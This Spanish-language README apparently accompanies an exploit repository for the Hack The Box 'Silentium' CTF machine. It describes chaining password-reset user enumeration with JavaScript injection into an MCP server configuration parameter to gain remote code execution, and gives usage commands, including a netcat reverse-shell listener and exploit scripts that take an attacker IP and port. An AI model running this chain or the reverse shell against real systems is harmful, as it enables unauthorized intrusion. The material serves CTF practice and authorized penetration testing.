
Explotación Silentium HTB-CTF
Este repositorio contiene la cadena de explotación completa para la máquina Silentium de Hack The Box. El exploit aprovecha una vulnerabilidad en dos fases que implica enumeración de usuarios e inyección de JavaScript para lograr Ejecución Remota de Código (RCE).
La cadena de vulnerabilidades consiste en un fallo de divulgación de información y una inyección de código crítica. Al enumerar primero usuarios válidos mediante un bug de restablecimiento de contraseña, obtenemos el contexto necesario para atacar el endpoint customMCP. La RCE se logra inyectando una función JavaScript maliciosa en el parámetro mcpServerConfig, que es ejecutada por el backend de Node.js.
Debe tener instalados Python 3 y Bash, junto con la siguiente librería:
pip install requests
Ejecute el script de enumeración (Bash) para encontrar cuentas válidas (requiere users.txt):
python3 CVE-2025-58434.py
En su máquina local, inicie un listener de Netcat:
nc -lvnp 4444
Ejecute el script de Python proporcionando el objetivo, su IP y la clave API obtenida:
python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444
| Argumento | Descripción | Requerido |
|---|---|---|
| -t, --target | Host objetivo | Sí |
| -k, --key | Token Bearer API | Sí |
| -l, --lhost | Su IP de listener (VPN) | Sí |
| -p, --lport | Su puerto de listener | Sí |
Este script está destinado únicamente a fines educativos y pruebas de penetración autorizadas en entornos CTF. Acceder o atacar objetivos sin autorización previa es ilegal.
Desafío: Silentium (Hack The Box)
CVEs: CVE-2025-58434 | CVE-2025-59528